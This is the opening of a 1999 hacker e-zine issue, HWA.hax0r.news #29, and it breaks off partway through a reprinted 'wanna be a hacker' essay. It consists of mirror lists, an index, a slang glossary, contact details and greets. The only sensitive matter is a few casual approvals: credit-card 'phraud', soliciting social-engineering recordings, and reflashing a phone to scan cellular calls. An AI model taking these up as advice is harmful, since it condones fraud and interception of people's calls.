[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 29 Volume 1 1999 Aug 14th 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== Paraphrased irc nonsense I found amusing; [16:00] *** Quits: wyze1 (Of course my password is my pets name! My parrot's name was XzF!^lP, but I changed it to polly) New mirror sites http://www.ducktank.net/hwa/issues.html. http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwazine.cjb.net/ http://www.hackunlimited.com/files/secu/papers/hwa/ * http://hwa.hax0r.news.8m.com/ * http://www.fortunecity.com/skyscraper/feature/103/ * Crappy free sites but they offer 20M & I need the space... HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth and airportman for the Cubesoft bandwidth. Also shouts out to all our mirror sites! tnx guys. http://www.csoft.net/~hwa http://www.digitalgeeks.com/hwa HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm For many, faith is a suitable substitute for knowledge, as death is for a difficult life. SYNOPSIS (READ THIS) -------------------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #29 =-----------------------------------------------------------------------= We could use some more people joining the channel, its usually pretty quiet, we don't bite (usually) so if you're hanging out on irc stop by and idle a while and say hi... ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** *** *** *** Note that the channel isn't there to entertain you its for *** *** you to talk to us and impart news, if you're looking for fun*** *** then do NOT join our channel try #weirdwigs or something... *** *** we're not #chatzone or #hack *** *** *** ******************************************************************* =-------------------------------------------------------------------------= Issue #29 =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Intros =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. 03.0 .. So you wanna be a hacker? by Avatar.............................. 04.0 .. Microsoft vulnerability bulletin: Encapsulated SMTP address...... 05.0 .. Disrupting Net Access a Cybercrime? ............................. 06.0 .. IDEA CAST BO2K PLUGIN VULNERABILITY.............................. 07.0 .. Mitnick gets a welcome birthday present from the LA DA........... 08.0 .. An Accurate Look At Mitnick's Life Behind Bars .................. 09.0 .. Sony and EA Take Down Paradigm .................................. 10.0 .. Regional Computer Forensics Lab Set Up in San Diego ............. 11.0 .. University Sys Admin Faced with 10 Years for Using Too Much Bandwidth 12.0 .. Chaos Computer Camp Fun For All Last Weekend .................... 13.0 .. NIST Announces the AES Finalist Candidates ...................... 14.0 .. Clinton Designates Group to Look At CyberCrime .................. 15.0 .. Taiwan Government Web Sites Defaced ............................. 16.0 .. DoD Ordered to Change All Passwords ............................. 17.0 .. Belgians Under Cyber Attack From One Man ........................ 18.0 .. IRDP Hole in Win and Sol Leave Users Open to Attack.............. 19.0 .. More Government Sites Defaced ................................... 20.0 .. Taiwan Strikes back at China via Net ............................ 21.0 .. Monopoly Virus Taunts Bill Gates and Microsoft .................. 22.0 .. FBI Fingerprint database now online.............................. 23.0 .. 45 Named as Enemies of the Internet ............................. 24.0 .. Alliance Z3 Defaces Spanish Web Site ............................ 25.0 .. Government has a Hard Time with Bureaucracy ..................... 26.0 .. Law Not a Substitute for Good Security .......................... 27.0 .. Network-centric Warfare to be Used by Military .................. 28.0 .. Gateway plans for Amiga ......................................... 29.0 .. Mitnick Moved to County Jail .................................... 30.0 .. The problem with ISP's and security sites........................ 31.0 .. The Internet Auditing Project ................................... 32.0 .. TCS Web Page Defacer Pleads Guilty .............................. 33.0 .. Cybercrime On the Rise in Russia - First Offender Convicted ..... 34.0 .. ToorCon Less Than One Month Away ................................ 35.0 .. FRESHMEAT.NET BOUGHT............................................. 36.0 .. LINUXPPC CRACK-CONTEST FINISHED.................................. 37.0 .. INFOSEEK HACKED.................................................. 38.0 .. HACKERS, IT CONSULTANTS EMBRACE FREE SECURITY TOOL............... 39.0 .. TRINUX 0.62 RELEASED............................................. 40.0 .. GOVERNMENT FACES SECURITY SKILLS SHORTAGE........................ 41.0 .. SOFTWARE REVERSE ENGINEERING ALLOWED IN AUSTRALIA................ 42.0 .. IRELAND INTENDS TO CRIMINALIZE E-SIGNATURE FRAUD................. 43.0 .. ISRAEL AND PIRACY................................................ 44,0 .. OUTSIDE HELP ISN'T WANTED ....................................... 45.0 .. HACKER MYTHOLOGY................................................. 46.0 .. DEFAULT ISSUE #1................................................. 47.0 .. MICROSOFT AND AOL................................................ 48.0 .. INTERVIEW WITH ERIC RAYMOND...................................... 49.0 .. CODE-CRACKING COMPUTER CAUSES CONCERN............................ 50.0 .. HACKING YOUR WAY TO AN IT CARREER................................ 51.0 .. BALTIMORE TECHNOLOGIES TO SHIP ENCRYPTION TOOL FOR XML........... 52.0 .. STARTUP WANTS TO SELL UNTAPPABLE PHONES.......................... 53.0 .. OUTSMARTING THE WILY COMPUTER VIRUS.............................. 54.0 .. NEW MAIL ATTACK IDENTIFIED....................................... 55.0 .. ERROR IN MICROSOFT PATCH......................................... 56.0 .. NEW IE5 BUG EXPOSES PASSWORDS.................................... 57.0 .. KEY TO CRYPTO SUCCESS: DON'T BE BORN IN THE USA.................. 58.0 .. L0PHT IRDP ADVISORY.............................................. 59.0 .. Stronger computers, easier encrypton, RSA coding................. 60.0 .. 'Security Police isn't doing enough'............................. 61.0 .. Hack attacks drive outsourced security........................... 62.0 .. Backdoors in Windows?............................................ 63.0 .. The newbies guide to FUD (Fear Uncertainty and Doubt)............ 64.0 .. Crashing AntiOnline's SMTP server?............................... 65.0 .. Rootshell.com review............................................. 66.0 .. The inevitability of failure..................................... =--------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information....................................... Current dates: POSTPONED til further notice, place: TBA.. ................. Ha.Ha .. Humour and puzzles ............................................ Hey You!........................................................ =------=........................................................ Send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. Stuff you can email: - Prank phone calls in .ram or .mp* format - Fone tones and security announcements from PBX's etc - fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities) - reserved for one smiley face -> :-) <- - PHACV lists of files that you have or phac cd's you own (we have a burner, *g*) - burns of phac cds (email first to make sure we don't already have em) - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp* If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/ NewsTrolls .(daily news ).........http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+Security................http://www.gammaforce.org/ News site+Security................http://www.projectgamma.com/ News site+Security................http://securityhole.8m.com/ News site+Security related site...http://www.403-security.org/ *DOWN* News/Humour site+ ................http://www.innerpulse.com News/Techie news site.............http://www.slashdot.org +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/SEARCH/ http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack http://www.ottawacitizen.com/business/ http://search.yahoo.com.sg/search/news_sg?p=hack http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack http://www.zdnet.com/zdtv/cybercrime/ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm http://freespeech.org/eua/ Electronic Underground Affiliation http://ech0.cjb.net ech0 Security http://axon.jccc.net/hir/ Hackers Information Report http://net-security.org Net Security http://www.403-security.org Daily news and security related site Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html Link About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black eentity ...( '' '' ): Currently active/IRC+ man in black Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Qubik ............................: United Kingdom D----Y ...........................: USA/world media HWA members ......................: World Media Past Foreign Correspondants (currently inactive or presumed dead) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ N0Portz ..........................: Australia system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed Spikeman's site is down as of this writing, if it comes back online it will be posted here. http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck, where the fuck, when the fuck etc .. *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Ken Williams/tattooman of PacketStorm, hang in there Ken...:( & Kevin Mitnick (Happy Birthday) kewl sites: + http://www.securityportal.com/ NEW + http://www.securityfocus.com/ NEW + http://www.hackcanada.com/ + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.packetstorm.harvard.edu/ ******* DOWN (THANKS JP) ****** + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? Thanks to myself for providing the info from my wired news feed and others from whatever sources, also to Spikeman for sending in past entries.... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /*Thin pickings this week for news, but here we go with #29 * * * Remember to send in any articles you want to write to us! * wether its technology, hacking, internet, or phreaking... * also poetry and short cyberpunk stories will be considered * for printing, use us as your distribution medium... * send submissions to: hwa@press.usmc.net */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. 03.0 So you wanna be a hacker? by Avatar ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ retro-text picked up off the web by - ed ... http://dmatrix.teamshadow.com/hack/statemind.txt So you wanna be a HACKER huh? It's a state-of-MIND! ..you can induce it - but only if you are willing to drive yourself mad enough! Go read and practice until you have mastered at least Assembly language and Intermediate Level Electronics! Without this foundation you'll be just another little geek, who might know the magic words to the spell but dosent understand what he's doing! So RTFM! ..so what does that mean? Read The Fucking Manual! You will be sooo amazed at how easy most things are if you just try to read the manual first! The truth is: Most people cant read. Or they read poorly if they read at all. So if you can't really read...STOP RIGHT HERE. GO learn to read first. If you can't read at a minimum 12th Grade level you cant be a hacker. Reading is the basic skill you must have to do EVERYTHING BEYOND THIS POINT. Tell your friends you cant party...you're busy. Spend at least 4 hours a day at your new-found fascination...or decide right here and now that you cant cut it! If you CAN, get a copy of MINIX or LINUX...start learning about OPERATING SYSTEMS. Then start your 1st real hack...try building a computer-controlled, DTMF dialer card for your cheap PC...write the code to use it with, make it a TSR to keep life interesting...now port it to MINIX or whatever ...better yet, port it as an IOCTL call at kernel level! You keep reading... Now you're ready to take on something more complex - go to the Library, start a literature search; topic: Telephone Technologies. RTFM! Learm about the ancient cross-bar, the Pre-ESS systems, the fab MFTSS, the TELEX boxes and circuits...keep reading...buy up an older, cheap (like under $50) cellular phone...by this time you should already have a subscription to 'Nuts & Volts" as well as a few other grassroots technology pubs....buy a copy of the "Cellular Hacker's Bible"....start by doing something simple.. ..disassemble and re-write the phone`s control ROM to allow it to function as an 800MHZ scanner...hopefully you've assembled a large array of tools and test gear by now. You've got a good dual-trace scope, some pc-based PROM burner, a signal generator, a logic probe or two, maybe even a microprocessor-emulator for the 5051, the Z80, the 68010 or something....you may have been dragged into some fields-afar by life - incorporate them: If somebody drasgged you into SCUBA, build your own sonar. If you have gotten interested in amateur radio, you can build a lot of swell stuff...I recommend you checkout Packet's AX25A level2 protocol...very slick stuff! If your bud's are all into motors, take a whak at doing your own Performance PROMS for GM's F.I. and spark advance curves...or try adapting some Volkswagen/BOSCHE Kjetronics F.I. to a Harley Davidson!..maybe you're into music so you buy a synthesizer and learn all about electronic music, you start hacking analog modules and build a nicer synth than you could buy! Then you interface it to a MIDI port on a cheap 286AT and then hack up some sequencer software, or buy some and then disassemble it to fix all the bugs! You keep reading... By now most of your friends are also "far into the pudding", you have either gained 50 lbs or gone totally skinny...your skin tone is 2 shades lighter from being indoors so long...most of the opposite sex is either totally freaked by or with you - they either dig you, or they dont!...you're probably knocking on the door of what will be a $60K+/yr job as a systems analyst...and you are well-aware that 90% of the people in this world can't talk their way out of a badly cooked steak at the local eatery, let alone install a new motherboard in their PC! So you pick up some extra cash on doing shit like that for the straights...you keep reading, and RTFM'ing higher and higher, learning about networks...the VCR breaks down and your SO bitches about having to wait till monday to have it fixed...you fix it in about 40 minutes....the next day the clothes dryer starts to make squeeking noises like a 50' mouse, you've never fixed one before - but somehow it's not that difficult to open the bastard up and find the squeek and fix it...and suddenly it dawns on you that hacking code or hardware is pretty much the same! You keep reading... Congrats, you are now a real hacker. Absolutly nothing but a lack of time (or in some cases money) can stop you. You are a true Technologic Philosopher...you can function in places a mere Engineer or Scientist would truly FEAR TO TREAD! You can read better than Evelyn Wood, you have a collection of tools that would make a Master Machinist and a Prototype EE or ME cry. You can calculate series and parallel resonant circuits in your head. You can fix any consumer appliance - if you can get the parts. Your car has either become one of your main hacks or you'ver 